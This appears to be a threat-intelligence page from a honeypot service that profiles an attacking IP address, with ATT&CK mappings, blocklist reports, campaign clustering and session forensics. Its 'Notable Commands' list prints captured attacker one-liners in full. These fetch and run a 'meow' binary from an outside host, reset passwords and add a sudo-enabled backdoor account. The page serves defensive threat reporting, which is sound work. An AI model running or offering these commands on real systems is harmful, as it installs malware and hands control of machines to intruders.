IntrusionLabs IntrusionLabs
← Back to feed

35.221.50.30

TAGGED MALICIOUS how we decide →
Threat Confidence
62%
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
Total Events
311
Above average by volume
Agent Count
1
First / Last Seen
2026-06-01 04:42 — 2026-06-01 04:46
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595 T1595.002
Initial Access
T1078
Execution
T1059.004
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1016 T1046 T1082
Command and Control
T1105
External Corroboration
Blocklist.de
Reported 2026-06-01 05:01
blocklist_de:reported
DShield Top Attackers
Reported 2026-06-01 05:01
dshield:top_attacker
Campaigns
HASSH 16443846184e… — SSH-2.0-Go (92 IPs, 18 countries) HASSH Active high 🇺🇸 US
92 IPs 71063 events
mysql:bruteforcessh:bruteforce
2026-02-22 — ongoing · 92 IPs are running an identical SSH client (HASSH fingerprint 16443846184e…). Top network: Network Solutions, LLC (AS19871). Geographic …
AS396982 Google LLC ASN Active medium 🇧🇪 BE
96 IPs 8657 events
ftp:bruteforcehttp:scanmysql:bruteforcessh:bruteforce
2026-02-18 — ongoing · 96 IPs from the same network (Google LLC, AS396982) were active during overlapping time periods. Temporal correlation across …
Session Forensics
scanner ×1 reconnaissance ×1 malware_dropper ×1 credential_probe ×3 interactive_operator ×4 opportunistic_bruter ×3
Sessions
13 (9 with login)
Avg Depth Score
0.57
Commands Executed
142
Files Downloaded
1
Notable Commands
  • echo 'Password' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew)
  • whoami
  • cd /tmp
  • ulimit -n 1020000
  • rm -rf meow*
  • wget http://35.237.91.38/meow
  • curl -O http://35.237.91.38/meow
  • chmod 777 meow
  • ./meow
  • echo '123456789' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew)
  • echo '111111' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew)
  • echo '112233' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew)
  • echo '000000' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew)
  • echo '1234' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew)
Fingerprints
HASSH
16443846184eafde36765c9bab2f4397
SSH Client
SSH-2.0-Go
Evidence Timeline
Credential Probe d23f524de638 newark_01 · 2026-06-01 04:42
1 20%
Loading events...
Credential Probe b0a6454f482e newark_01 · 2026-06-01 04:42
1 20%
Loading events...
Credential Probe 622cf4d443f0 newark_01 · 2026-06-01 04:42
1 20%
Loading events...
Interactive Operator aa13fb1e850b newark_01 · 2026-06-01 04:42
28 1 90%
Loading events...
Interactive Operator 516115bda449 newark_01 · 2026-06-01 04:42
28 1 90%
Loading events...
Malware Dropper 46a0fc76d2e9 newark_01 · 2026-06-01 04:42
26 1 1 100%
Loading events...
Interactive Operator a253f5c63d3f newark_01 · 2026-06-01 04:42
28 1 90%
Loading events...
Reconnaissance ea333e16b62b newark_01 · 2026-06-01 04:42
4 1 60%
Loading events...
Interactive Operator b548d75475f8 newark_01 · 2026-06-01 04:42
28 1 90%
Loading events...
Opportunistic Bruter 78fb1bb524a6 newark_01 · 2026-06-01 04:42
1 50%
Loading events...
Opportunistic Bruter 57f15baa8ee7 newark_01 · 2026-06-01 04:42
1 50%
Loading events...
Opportunistic Bruter a0341f27daf2 newark_01 · 2026-06-01 04:42
1 50%
Loading events...
Scanner babc7f8aa599 newark_01 · 2026-06-01 04:42
15%
Loading events...